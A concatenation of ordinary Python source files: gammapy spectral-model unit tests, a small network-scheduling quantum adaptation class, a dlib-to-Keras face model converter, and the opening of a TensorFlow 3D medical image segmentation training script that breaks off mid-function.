val_at_2TeV=u.Quantity(0.28284271247461906, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(0.9956923907948155, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(2.2372256145972207, "TeV cm-2 s-1"),
),
dict(
name="sbpl-hard",
model=SmoothBrokenPowerLawSpectralModel(
index1=2.5 * u.Unit(""),
index2=1.5 * u.Unit(""),
amplitude=4 / u.cm ** 2 / u.s / u.TeV,
ebreak=0.5 * u.TeV,
reference=1 * u.TeV,
beta=1,
),
val_at_2TeV=u.Quantity(3.5355339059327378, "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(13.522782989735022, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(40.06681812966845, "TeV cm-2 s-1"),
),
dict(
name="pbpl",
model=PiecewiseNormSpectralModel(
energy=[1, 3, 7, 10] * u.TeV, norms=[1, 5, 3, 0.5] * u.Unit(""),
),
val_at_2TeV=u.Quantity(2.76058404, ""),
integral_1_10TeV=u.Quantity(24.758255, "TeV"),
eflux_1_10TeV=u.Quantity(117.745068, "TeV2"),
),
]
# Add compound models
TEST_MODELS.append(
dict(
name="compound3",
model=TEST_MODELS[0]["model"] + TEST_MODELS[0]["model"],
val_at_2TeV=TEST_MODELS[0]["val_at_2TeV"] * 2,
integral_1_10TeV=TEST_MODELS[0]["integral_1_10TeV"] * 2,
eflux_1_10TeV=TEST_MODELS[0]["eflux_1_10TeV"] * 2,
)
)
TEST_MODELS.append(
dict(
name="compound6",
model=TEST_MODELS[11]["model"] + u.Quantity(4, "cm-2 s-1 TeV-1"),
val_at_2TeV=TEST_MODELS[11]["val_at_2TeV"] * 2,
integral_1_10TeV=TEST_MODELS[11]["integral_1_10TeV"] * 2,
eflux_1_10TeV=TEST_MODELS[11]["eflux_1_10TeV"] * 2,
)
)
TEST_MODELS.append(
dict(
name="table_model",
model=table_model(),
# Values took from power law expectation
val_at_2TeV=u.Quantity(4 * 2.0 ** (-2.3), "cm-2 s-1 TeV-1"),
integral_1_10TeV=u.Quantity(2.9227116204223784, "cm-2 s-1"),
eflux_1_10TeV=u.Quantity(6.650836884969039, "TeV cm-2 s-1"),
)
)
@requires_dependency("scipy")
@pytest.mark.parametrize("spectrum", TEST_MODELS, ids=lambda _: _["name"])
def test_models(spectrum):
model = spectrum["model"]
energy = 2 * u.TeV
value = model(energy)
assert_quantity_allclose(value, spectrum["val_at_2TeV"], rtol=1e-7)
if "val_at_3TeV" in spectrum:
energy = 3 * u.TeV
value = model(energy)
assert_quantity_allclose(value, spectrum["val_at_3TeV"], rtol=1e-7)
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
assert_quantity_allclose(
model.integral(energy_min=energy_min, energy_max=energy_max),
spectrum["integral_1_10TeV"],
rtol=1e-5,
)
assert_quantity_allclose(
model.energy_flux(energy_min=energy_min, energy_max=energy_max),
spectrum["eflux_1_10TeV"],
rtol=1e-5,
)
if "e_peak" in spectrum:
assert_quantity_allclose(model.e_peak, spectrum["e_peak"], rtol=1e-2)
# inverse for ConstantSpectralModel is irrelevant.
# inverse for Gaussian and PiecewiseNormSpectralModel have a degeneracy
if not (
isinstance(model, ConstantSpectralModel)
or spectrum["name"] == "compound6"
or spectrum["name"] == "GaussianSpectralModel"
or spectrum["name"] == "pbpl"
):
assert_quantity_allclose(model.inverse(value), 2 * u.TeV, rtol=0.01)
if "integral_infinity" in spectrum:
energy_min = 0 * u.TeV
energy_max = 10000 * u.TeV
assert_quantity_allclose(
model.integral(energy_min=energy_min, energy_max=energy_max),
spectrum["integral_infinity"],
)
model.to_dict()
assert "" in str(model)
# check that an array evaluation works (otherwise e.g. plotting raises an error)
e_array = [2, 10, 20] * u.TeV
e_array = e_array[:, np.newaxis, np.newaxis]
val = model(e_array)
assert val.shape == e_array.shape
assert_quantity_allclose(val[0], spectrum["val_at_2TeV"])
def test_model_unit():
pwl = PowerLawSpectralModel()
value = pwl(500 * u.MeV)
assert value.unit == "cm-2 s-1 TeV-1"
@requires_dependency("matplotlib")
def test_model_plot():
pwl = PowerLawSpectralModel(
amplitude=1e-12 * u.Unit("TeV-1 cm-2 s-1"), reference=1 * u.Unit("TeV"), index=2
)
pwl.amplitude.error = 0.1e-12 * u.Unit("TeV-1 cm-2 s-1")
with mpl_plot_check():
pwl.plot((1 * u.TeV, 10 * u.TeV))
with mpl_plot_check():
pwl.plot_error((1 * u.TeV, 10 * u.TeV))
def test_to_from_dict():
spectrum = TEST_MODELS[0]
model = spectrum["model"]
model_dict = model.to_dict()
# Here we reverse the order of parameters list to ensure assignment is correct
model_dict['parameters'].reverse()
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, PowerLawSpectralModel)
actual = [par.value for par in new_model.parameters]
desired = [par.value for par in model.parameters]
assert_quantity_allclose(actual, desired)
actual = [par.frozen for par in new_model.parameters]
desired = [par.frozen for par in model.parameters]
assert_allclose(actual, desired)
def test_to_from_dict_partial_input():
spectrum = TEST_MODELS[0]
model = spectrum["model"]
model_dict = model.to_dict()
# Here we remove the reference energy
model_dict['parameters'].remove(model_dict['parameters'][2])
print(model_dict['parameters'][0])
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, PowerLawSpectralModel)
actual = [par.value for par in new_model.parameters]
desired = [par.value for par in model.parameters]
assert_quantity_allclose(actual, desired)
actual = [par.frozen for par in new_model.parameters]
desired = [par.frozen for par in model.parameters]
assert_allclose(actual, desired)
def test_to_from_dict_compound():
spectrum = TEST_MODELS[-2]
model = spectrum["model"]
assert spectrum["name"] == "compound6"
model_dict = model.to_dict()
assert model_dict["operator"] == "add"
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, CompoundSpectralModel)
actual = [par.value for par in new_model.parameters]
desired = [par.value for par in model.parameters]
assert_quantity_allclose(actual, desired)
@requires_dependency("matplotlib")
@requires_data()
def test_table_model_from_file():
filename = "$GAMMAPY_DATA/ebl/ebl_franceschini.fits.gz"
absorption_z03 = TemplateSpectralModel.read_xspec_model(
filename=filename, param=0.3
)
with mpl_plot_check():
absorption_z03.plot(energy_range=(0.03, 10), energy_unit=u.TeV, flux_unit="")
@requires_data()
def test_absorption():
# absorption values for given redshift
redshift = 0.117
absorption = EBLAbsorptionNormSpectralModel.read_builtin(
"dominguez", redshift=redshift
)
# Spectral model corresponding to PKS 2155-304 (quiescent state)
index = 3.53
amplitude = 1.81 * 1e-12 * u.Unit("cm-2 s-1 TeV-1")
reference = 1 * u.TeV
pwl = PowerLawSpectralModel(index=index, amplitude=amplitude, reference=reference)
# EBL + PWL model
model = pwl * absorption
desired = u.Quantity(5.140765e-13, "TeV-1 s-1 cm-2")
assert_quantity_allclose(model(1 * u.TeV), desired, rtol=1e-3)
assert model.model2.alpha_norm.value == 1.0
# EBL + PWL model: test if norm of EBL=0: it mean model =pwl
model.parameters["alpha_norm"].value = 0
assert_quantity_allclose(model(1 * u.TeV), pwl(1 * u.TeV), rtol=1e-3)
# EBL + PWL model: Test with a norm different of 1
absorption = EBLAbsorptionNormSpectralModel.read_builtin(
"dominguez", redshift=redshift, alpha_norm=1.5
)
model = pwl * absorption
desired = u.Quantity(2.739695e-13, "TeV-1 s-1 cm-2")
assert model.model2.alpha_norm.value == 1.5
assert_quantity_allclose(model(1 * u.TeV), desired, rtol=1e-3)
# Test error propagation
model.model1.amplitude.error = 0.1 * model.model1.amplitude.value
dnde, dnde_err = model.evaluate_error(1 * u.TeV)
assert_allclose(dnde_err / dnde, 0.1)
@requires_data()
def test_absorbed_extrapolate():
ebl_model = "dominguez"
z = 0.0001
alpha_norm = 1
absorption = EBLAbsorptionNormSpectralModel.read_builtin(ebl_model)
values = absorption.evaluate(1 * u.TeV, z, alpha_norm)
assert_allclose(values, 1)
def test_ecpl_integrate():
# regression test to check the numerical integration for small energy bins
ecpl = ExpCutoffPowerLawSpectralModel()
value = ecpl.integral(1 * u.TeV, 1.1 * u.TeV)
assert value.isscalar
assert_quantity_allclose(value, 8.380714e-14 * u.Unit("s-1 cm-2"))
def test_pwl_pivot_energy():
pwl = PowerLawSpectralModel(amplitude="5.35510540e-11 cm-2 s-1 TeV-1")
pwl.covariance = [
[0.0318377 ** 2, 6.56889442e-14, 0],
[6.56889442e-14, 0, 0],
[0, 0, 0],
]
assert_quantity_allclose(pwl.pivot_energy, 3.3540034240210987 * u.TeV)
def test_TemplateSpectralModel_evaluate_tiny():
energy = np.array([1.00000000e06, 1.25892541e06, 1.58489319e06, 1.99526231e06])
values = np.array([4.39150790e-38, 1.96639562e-38, 8.80497507e-39, 3.94262401e-39])
model = TemplateSpectralModel(
energy=energy, values=values * u.Unit("MeV-1 s-1 sr-1")
)
result = model.evaluate(energy)
tiny = np.finfo(np.float32).tiny
mask = abs(values) - tiny > tiny
np.testing.assert_allclose(
values[mask] / values.max(), result[mask].value / values.max()
)
mask = abs(result.value) - tiny <= tiny
assert np.all(result[mask] == 0.0)
def test_TemplateSpectralModel_compound():
energy = [1.00e06, 1.25e06, 1.58e06, 1.99e06] * u.MeV
values = [4.39e-7, 1.96e-7, 8.80e-7, 3.94e-7] * u.Unit("MeV-1 s-1 sr-1")
template = TemplateSpectralModel(energy=energy, values=values)
correction = PowerLawNormSpectralModel(norm=2)
model = CompoundSpectralModel(template, correction, operator=operator.mul)
assert np.allclose(model(energy), 2 * values)
model_mul = template * correction
assert isinstance(model_mul, CompoundSpectralModel)
assert np.allclose(model_mul(energy), 2 * values)
model_dict = model.to_dict()
assert model_dict["operator"] == "mul"
model_class = SPECTRAL_MODEL_REGISTRY.get_cls(model_dict["type"])
new_model = model_class.from_dict(model_dict)
assert isinstance(new_model, CompoundSpectralModel)
assert np.allclose(new_model(energy), 2 * values)
@requires_dependency("naima")
class TestNaimaModel:
# Used to test model value at 2 TeV
energy = 2 * u.TeV
# Used to test model integral and energy flux
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
# Used to that if array evaluation works
e_array = [2, 10, 20] * u.TeV
e_array = e_array[:, np.newaxis, np.newaxis]
def test_pion_decay(self):
import naima
particle_distribution = naima.models.PowerLaw(
amplitude=2e33 / u.eV, e_0=10 * u.TeV, alpha=2.5
)
radiative_model = naima.radiative.PionDecay(
particle_distribution, nh=1 * u.cm ** -3
)
model = NaimaSpectralModel(radiative_model)
val_at_2TeV = 9.725347355450884e-14 * u.Unit("cm-2 s-1 TeV-1")
integral_1_10TeV = 3.530537143620737e-13 * u.Unit("cm-2 s-1")
eflux_1_10TeV = 7.643559573105779e-13 * u.Unit("TeV cm-2 s-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
assert_quantity_allclose(
model.integral(energy_min=self.energy_min, energy_max=self.energy_max),
integral_1_10TeV,
)
assert_quantity_allclose(
model.energy_flux(energy_min=self.energy_min, energy_max=self.energy_max),
eflux_1_10TeV,
)
val = model(self.e_array)
assert val.shape == self.e_array.shape
model.amplitude.error = 0.1 * model.amplitude.value
out = model.evaluate_error(1 * u.TeV)
assert_allclose(out.data, [5.266068e-13, 5.266068e-14], rtol=1e-3)
def test_ic(self):
import naima
particle_distribution = naima.models.ExponentialCutoffBrokenPowerLaw(
amplitude=2e33 / u.eV,
e_0=10 * u.TeV,
alpha_1=2.5,
alpha_2=2.7,
e_break=900 * u.GeV,
e_cutoff=10 * u.TeV,
)
radiative_model = naima.radiative.InverseCompton(
particle_distribution, seed_photon_fields=["CMB"]
)
model = NaimaSpectralModel(radiative_model)
val_at_2TeV = 4.347836316893546e-12 * u.Unit("cm-2 s-1 TeV-1")
integral_1_10TeV = 1.595813e-11 * u.Unit("cm-2 s-1")
eflux_1_10TeV = 2.851283e-11 * u.Unit("TeV cm-2 s-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
assert_quantity_allclose(
model.integral(energy_min=self.energy_min, energy_max=self.energy_max),
integral_1_10TeV,
rtol=1e-5,
)
assert_quantity_allclose(
model.energy_flux(energy_min=self.energy_min, energy_max=self.energy_max),
eflux_1_10TeV,
rtol=1e-5,
)
val = model(self.e_array)
assert val.shape == self.e_array.shape
def test_synchrotron(self):
import naima
particle_distribution = naima.models.LogParabola(
amplitude=2e33 / u.eV, e_0=10 * u.TeV, alpha=1.3, beta=0.5
)
radiative_model = naima.radiative.Synchrotron(particle_distribution, B=2 * u.G)
model = NaimaSpectralModel(radiative_model)
val_at_2TeV = 1.0565840392550432e-24 * u.Unit("cm-2 s-1 TeV-1")
integral_1_10TeV = 4.449186e-13 * u.Unit("cm-2 s-1")
eflux_1_10TeV = 4.594121e-13 * u.Unit("TeV cm-2 s-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
assert_quantity_allclose(
model.integral(energy_min=self.energy_min, energy_max=self.energy_max),
integral_1_10TeV,
rtol=1e-5,
)
assert_quantity_allclose(
model.energy_flux(energy_min=self.energy_min, energy_max=self.energy_max),
eflux_1_10TeV,
rtol=1e-5,
)
val = model(self.e_array)
assert val.shape == self.e_array.shape
model.B.value = 3 # update B
val_at_2TeV = 5.1985064062296e-16 * u.Unit("cm-2 s-1 TeV-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV)
def test_ssc(self):
import naima
ECBPL = naima.models.ExponentialCutoffBrokenPowerLaw(
amplitude=3.699e36 / u.eV,
e_0=1 * u.TeV,
e_break=0.265 * u.TeV,
alpha_1=1.5,
alpha_2=3.233,
e_cutoff=1863 * u.TeV,
beta=2.0,
)
radiative_model = naima.radiative.InverseCompton(
ECBPL,
seed_photon_fields=[
"CMB",
["FIR", 70 * u.K, 0.5 * u.eV / u.cm ** 3],
["NIR", 5000 * u.K, 1 * u.eV / u.cm ** 3],
],
Eemax=50 * u.PeV,
Eemin=0.1 * u.GeV,
)
B = 125 * u.uG
radius = 2.1 * u.pc
nested_models = {"SSC": {"B": B, "radius": radius}}
model = NaimaSpectralModel(radiative_model, nested_models=nested_models)
assert_quantity_allclose(model.B.quantity, B)
assert_quantity_allclose(model.radius.quantity, radius)
val_at_2TeV = 1.6703761561806372e-11 * u.Unit("cm-2 s-1 TeV-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV, rtol=1e-5)
model.parameters["B"].value = 100
val_at_2TeV = 1.441331153167876e-11 * u.Unit("cm-2 s-1 TeV-1")
value = model(self.energy)
assert_quantity_allclose(value, val_at_2TeV, rtol=1e-5)
def test_bad_init(self):
import naima
particle_distribution = naima.models.PowerLaw(
amplitude=2e33 / u.eV, e_0=10 * u.TeV, alpha=2.5
)
radiative_model = naima.radiative.PionDecay(
particle_distribution, nh=1 * u.cm ** -3
)
model = NaimaSpectralModel(radiative_model)
with pytest.raises(NotImplementedError):
NaimaSpectralModel.from_dict(model.to_dict())
with pytest.raises(NotImplementedError):
NaimaSpectralModel.from_parameters(model.parameters)
class TestSpectralModelErrorPropagation:
"""Test spectral model error propagation.
https://github.com/gammapy/gammapy/blob/master/docs/development/pigs/pig-014.rst#proposal
https://nbviewer.jupyter.org/github/gammapy/gammapy-extra/blob/master/experiments/uncertainty_estimation_prototype.ipynb
"""
def setup(self):
self.model = LogParabolaSpectralModel(
amplitude=3.76e-11 * u.Unit("cm-2 s-1 TeV-1"),
reference=1 * u.TeV,
alpha=2.44,
beta=0.25,
)
self.model.covariance = [
[1.31e-23, 0, -6.80e-14, 3.04e-13],
[0, 0, 0, 0],
[-6.80e-14, 0, 0.00899, 0.00904],
[3.04e-13, 0, 0.00904, 0.0284],
]
def test_evaluate_error_scalar(self):
# evaluate_error on scalar
out = self.model.evaluate_error(1 * u.TeV)
assert isinstance(out, u.Quantity)
assert out.unit == "cm-2 s-1 TeV-1"
assert out.shape == (2,)
assert_allclose(out.data, [3.7600e-11, 3.6193e-12], rtol=1e-3)
def test_evaluate_error_array(self):
out = self.model.evaluate_error([1, 100] * u.TeV)
assert out.shape == (2, 2)
expected = [[3.76e-11, 2.469e-18], [3.619e-12, 9.375e-18]]
assert_allclose(out.data, expected, rtol=1e-3)
def test_evaluate_error_unit(self):
out = self.model.evaluate_error(1e6 * u.MeV)
assert out.unit == "cm-2 s-1 TeV-1"
assert_allclose(out.data, [3.760e-11, 3.6193e-12], rtol=1e-3)
def test_integral_error(self):
out = self.model.integral_error(1 * u.TeV, 10 * u.TeV)
assert out.unit == "cm-2 s-1"
assert out.shape == (2,)
assert_allclose(out.data, [2.197e-11, 2.796e-12], rtol=1e-3)
def test_energy_flux_error(self):
out = self.model.energy_flux_error(1 * u.TeV, 10 * u.TeV)
assert out.unit == "TeV cm-2 s-1"
assert out.shape == (2,)
assert_allclose(out.data, [4.119e-11, 8.157e-12], rtol=1e-3)
def test_dnde_error_ecpl_model():
# Regression test for ECPL model
# https://github.com/gammapy/gammapy/issues/2007
model = ExpCutoffPowerLawSpectralModel(
amplitude=2.076183759227292e-12 * u.Unit("cm-2 s-1 TeV-1"),
index=1.8763343736076483,
lambda_=0.08703226432146616 * u.Unit("TeV-1"),
reference=1 * u.TeV,
)
model.covariance = [
[0.00204191498, -1.507724e-14, 0.0, -0.001834819, 0.0],
[-1.507724e-14, 1.6864740e-25, 0.0, 1.854251e-14, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0],
[-0.001834819175, 1.8542517e-14, 0.0, 0.0032559101, 0.0],
[0.0, 0.0, 0.0, 0.0, 0.0],
]
out = model.evaluate_error(1 * u.TeV)
assert_allclose(out.data, [1.903129e-12, 2.979976e-13], rtol=1e-3)
out = model.evaluate_error(0.1 * u.TeV)
assert_allclose(out.data, [1.548176e-10, 1.933612e-11], rtol=1e-3)
def test_integral_error_power_law():
energy = np.linspace(1 * u.TeV, 10 * u.TeV, 10)
energy_min = energy[:-1]
energy_max = energy[1:]
powerlaw = PowerLawSpectralModel()
powerlaw.parameters["index"].error = 0.4
powerlaw.parameters["amplitude"].error = 1e-13
flux, flux_error = powerlaw.integral_error(energy_min, energy_max)
assert_allclose(flux.value[0] / 1e-13, 5.0, rtol=1e-3)
assert_allclose(flux_error.value[0] / 1e-14, 7.915984, rtol=1e-3)
def test_integral_error_exp_cut_off_power_law():
energy = np.linspace(1 * u.TeV, 10 * u.TeV, 10)
energy_min = energy[:-1]
energy_max = energy[1:]
exppowerlaw = ExpCutoffPowerLawSpectralModel()
exppowerlaw.parameters["index"].error = 0.4
exppowerlaw.parameters["amplitude"].error = 1e-13
exppowerlaw.parameters["lambda_"].error = 0.03
flux, flux_error = exppowerlaw.integral_error(energy_min, energy_max)
assert_allclose(flux.value[0] / 1e-13, 5.05855622, rtol=0.01)
assert_allclose(flux_error.value[0] / 1e-14, 8.552617, rtol=0.01)
def test_energy_flux_error_power_law():
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
powerlaw = PowerLawSpectralModel()
powerlaw.parameters["index"].error = 0.4
powerlaw.parameters["amplitude"].error = 1e-13
enrg_flux, enrg_flux_error = powerlaw.energy_flux_error(energy_min, energy_max)
assert_allclose(enrg_flux.value / 1e-12, 2.303, rtol=0.001)
assert_allclose(enrg_flux_error.value / 1e-12, 1.085, rtol=0.001)
def test_energy_flux_error_exp_cutoff_power_law():
energy_min = 1 * u.TeV
energy_max = 10 * u.TeV
exppowerlaw = ExpCutoffPowerLawSpectralModel()
exppowerlaw.parameters["index"].error = 0.4
exppowerlaw.parameters["amplitude"].error = 1e-13
exppowerlaw.parameters["lambda_"].error = 0.03
enrg_flux, enrg_flux_error = exppowerlaw.energy_flux_error(energy_min, energy_max)
assert_allclose(enrg_flux.value / 1e-12, 2.788, rtol=0.001)
assert_allclose(enrg_flux_error.value / 1e-12, 1.419, rtol=0.001)
|
the-stack_0_25209
|
#!/usr/bin/env python3
#
# Copyright (c) 2019 Pedro Heleno Isolani
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
KEEP_CONFIGURATION = 0
EXPLOITATION = 1
EXPLORATION = 2
""" Simple Exponential Quantum Adaptation using different adaptation rates for Exploitation and Exploration """
class ExponentialQuantumAdaptation:
def __init__(self,
exploration_rate=0.05, exploration_trigger=5,
exploitation_rate=0.20, exploitation_trigger=1,
min_quantum=200):
self.exploration_rate = exploration_rate # % to increase BE quantum
self.exploitation_rate = exploitation_rate # % to decrease BE quantum
self.exploration_trigger = exploration_trigger # int to represent when to increase BE quantum
self.exploitation_trigger = exploitation_trigger # int to represent when to decrease BE quantum
self.exploration_counter = 0 # int to trigger exploration
self.exploitation_counter = 0 # int to trigger exploitation
self.min_quantum = min_quantum
self.status = KEEP_CONFIGURATION
def exploit(self):
self.exploitation_counter += 1
if self.exploitation_counter >= self.exploitation_trigger:
self.status = EXPLOITATION
self.exploitation_counter = 0
def explore(self):
self.exploration_counter += 1
if self.exploration_counter >= self.exploration_trigger:
self.status = EXPLORATION
self.exploration_counter = 0
def get_new_quantum(self, old_quantum):
if self.status == EXPLORATION:
new_quantum = int(old_quantum + (old_quantum * self.exploration_rate))
elif self.status == EXPLOITATION:
new_quantum = int(old_quantum - (old_quantum * self.exploitation_rate))
if new_quantum < self.min_quantum:
new_quantum = self.min_quantum
else:
new_quantum = int(old_quantum)
self.status = KEEP_CONFIGURATION
return new_quantum
def __str__(self):
return "Exploitation rate: " + str(self.exploitation_rate) + \
" trigger: " + str(self.exploitation_trigger) + \
" counter: " + str(self.exploitation_counter) + \
"Exploration rate:" + str(self.exploration_rate) + \
" trigger: " + str(self.exploration_trigger) + \
" counter: " + str(self.exploration_counter)
|
the-stack_0_25211
|
import os
import sys
import argparse
import tensorflow as tf
from converter.model import build_dlib_model
from converter.weights import load_weights
def main(args):
""" Main entry point """
# Build the model (just the graph)
keras_model = build_dlib_model(use_bn=False)
keras_model.summary()
# parse xml and load weights
load_weights(keras_model, args.xml_path)
# save it as h5
keras_model.save("dlib_face_recognition_resnet_model_v1.h5")
# save it as saved_model
tf.saved_model.save(keras_model,'./saved_model/')
def parse_arg(argv):
""" Parse the arguments """
arg_paser = argparse.ArgumentParser()
arg_paser.add_argument(
'--xml-path',
type=str,
required=True,
help='Path to the dlib recognition xml file')
return arg_paser.parse_args(argv)
if __name__ == '__main__':
main(parse_arg(sys.argv[1:]))
|
the-stack_0_25212
|
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import argparse
import SimpleITK as sitk
import tensorflow as tf
import os
import numpy as np
import pandas as pd
import time
import itertools
import random
import sys
import glob
import pickle
from datetime import datetime
from tensorflow.python.saved_model import loader
from dltk.io.augmentation import add_gaussian_noise, flip, extract_class_balanced_example_array, elastic_transform
from dltk.io.preprocessing import whitening
from myconfig import *
# supports numpy arrays and tensorflow tensors
def NDHWC_to_NCHWD(arr):
try:
return tf.transpose(arr, perm=(0,4,2,3,1))
except:
return arr.transpose((0,4,2,3,1))
def NCHWD_to_NDHWC(arr):
try:
return tf.transpose(arr, perm=(0,4,2,3,1))
except:
return arr.transpose((0,4,2,3,1))
def dataset_input_from_tfrecords(filenames, batch_size=1, num_epochs=1, shuffle=True):
# filenames = ["/var/data/file1.tfrecord", "/var/data/file2.tfrecord"]
dataset = tf.data.TFRecordDataset(filenames)
# Use `tf.parse_single_example()` to extract data from a `tf.Example`
# protocol buffer, and perform any additional per-record preprocessing.
def parser(record):
keys_to_features = {
'case_name': tf.FixedLenFeature([], tf.string),
'image_raw': tf.FixedLenFeature([], tf.string),
'label_raw': tf.FixedLenFeature([], tf.string),
}
parsed = tf.parse_single_example(record, keys_to_features)
case_name = parsed['case_name']
# Perform additional preprocessing on the parsed data.
image = tf.decode_raw(parsed['image_raw'], tf.uint8)
image = tf.reshape(image, [DEPTH, HEIGHT, WIDTH, 2])
label = tf.decode_raw(parsed['label_raw'], tf.uint8)
label = tf.reshape(label, [DEPTH, HEIGHT, WIDTH, 2])
image = tf.cast(image, tf.float32)
return image, label, case_name
# Use `Dataset.map()` to build a pair of a feature dictionary and a label
# tensor for each example.
dataset = dataset.map(parser)
if shuffle:
dataset = dataset.shuffle(buffer_size=128)
dataset = dataset.batch(batch_size)
# dataset = dataset.apply(tf.contrib.data.batch_and_drop_remainder(batch_size))
dataset = dataset.repeat(num_epochs)
iterator = dataset.make_one_shot_iterator()
features, labels, case_names = iterator.get_next()
return features, labels, case_names
def dice_tf(logits, labels, threshold=0.5, axis=[1,2,3], smooth=1e-5):
logits = tf.cast(logits, dtype=tf.float32)
labels = tf.cast(labels, dtype=tf.float32)
logits = tf.cast(logits > threshold, dtype=tf.float32)
labels = tf.cast(labels > threshold, dtype=tf.float32)
inse = tf.reduce_sum(tf.multiply(logits, labels), axis=axis)
l = tf.reduce_sum(logits, axis=axis)
r = tf.reduce_sum(labels, axis=axis)
hard_dice = (2. * inse + smooth) / (l + r + smooth)
hard_dice = tf.reduce_mean(hard_dice)
return hard_dice
def dice_loss1(logits, labels, threshold=0.5, axis=[1,2,3], smooth=1e-5):
# exponential_map = tf.exp(logits)
# sum_exp = tf.reduce_sum(exponential_map, 4, keep_dims=True)
# tensor_sum_exp = tf.tile(sum_exp, tf.stack([1, 1, 1, 1, tf.shape(logits)[4]]))
# prediction = tf.div(exponential_map,tensor_sum_exp)
prediction = tf.nn.softmax(logits, axis=4)
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
labels_expand = tf.concat([1-labels, labels], axis=4)
eps = 1e-5
intersection = tf.reduce_sum(prediction * labels_expand, axis=[1,2,3,4])
union = eps + tf.reduce_sum(prediction, axis=[1,2,3,4]) + tf.reduce_sum(labels_expand, axis=[1,2,3,4])
loss = tf.reduce_mean(1.0 - (2 * intersection/ (union)))
return loss
def dice_loss(logits, labels, threshold=0.5, axis=[1,2,3], smooth=1e-5):
labels = tf.cast(labels, tf.float32)
prediction = tf.nn.softmax(logits, axis=4)
eps = 1e-5
intersection = tf.reduce_sum(prediction[...,1] * labels, axis=[1,2,3])
union = eps + tf.reduce_sum(prediction[...,1], axis=[1,2,3]) + tf.reduce_sum(labels, axis=[1,2,3])
loss = tf.reduce_mean(1.0 - (2 * intersection/ (union)))
return loss
def computeDice(y_true, y_pred):
y_true_f = y_true.flatten()>0.5
y_pred_f = y_pred.flatten()>0.5
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + 1e-5) / (np.sum(y_true_f) + np.sum(y_pred_f) + 1e-5)
def focal_loss1(labels, logits, gamma=1.0, alpha=1.0):
epsilon = 1e-9
prediction = tf.nn.softmax(logits, axis=4)
model_out = tf.add(prediction, epsilon)
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
labels_expand = tf.concat([1-labels, labels], axis=4)
ce = tf.multiply(labels_expand, -tf.log(model_out))
weight = tf.multiply(labels_expand, tf.pow(tf.subtract(1., model_out), gamma))
fl = tf.multiply(alpha, tf.multiply(weight, ce))
reduced_fl = tf.reduce_mean(tf.reduce_max(fl, axis=[4]))
return reduced_fl
def focal_loss(labels, logits, alpha=0.25, gamma=2.0):
predictions = tf.nn.sigmoid(logits)
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
onehot_labels = tf.concat([1.-labels, labels], axis=4)
predictions_pt = tf.where(tf.equal(onehot_labels, 1.0), predictions, 1.-predictions)
# add small value to avoid 0
epsilon = 1e-8
alpha_t = tf.scalar_mul(alpha, tf.ones_like(onehot_labels, dtype=tf.float32))
alpha_t = tf.where(tf.equal(onehot_labels, 1.0), alpha_t, 1-alpha_t)
losses = tf.reduce_sum(-alpha_t * tf.pow(1. - predictions_pt, gamma) * tf.log(predictions_pt+epsilon), axis=4)
return tf.reduce_mean(losses)
def binary_cross_entropy(labels, logits):
labels = tf.expand_dims(tf.cast(labels, dtype=tf.float32), axis=4)
onehot_labels = tf.concat([1.-labels, labels], axis=4)
loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(labels=onehot_labels, logits=logits))
return loss
def parse_args():
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument("--net_type", type=str, default='myunet_bn')
parser.add_argument("--use_bn", type=int, default=1)
parser.add_argument("--use_crf", type=int, default=0)
parser.add_argument("--restore_ckpt_meta", type=str, default='')
parser.add_argument("--feat_index", type=int, default=0) # 0: ct, 1: pt
parser.add_argument('--random_seed', type=int, default=42)
parser.add_argument('--test_filenames', type=str, default='testForTest0.csv')
parser.add_argument('--norm_type', type=str, default='nonorm')
args = parser.parse_args()
return args
def main():
args = parse_args()
np.random.seed(args.random_seed)
tf.set_random_seed(args.random_seed)
subsets = ['train', 'val', 'test']
image_mean = IMAGE_MEAN
image_std = IMAGE_STD
image_mean_tensor = tf.constant(image_mean, dtype=tf.float32)
image_std_tensor = tf.constant(image_std, dtype=tf.float32)
phase_train = tf.placeholder(tf.bool, name='phase_train')
global_step = tf.Variable(0, trainable=False)
image_node = tf.placeholder(tf.float32, shape=[None, DEPTH, HEIGHT, WIDTH, 2])
label_node = tf.placeholder(tf.int32, shape=[None, DEPTH, HEIGHT, WIDTH, 2])
if args.norm_type == 'nonorm':
image_node_new = image_node
elif args.norm_type == 'globalnorm_mean':
image_node_new = image_node - image_mean_tensor
elif args.norm_type == 'globalnorm_meanstd':
image_node_new = image_node - image_mean_tensor
image_node_new /= image_std_tensor
elif args.norm_type == 'instancenorm_mean':
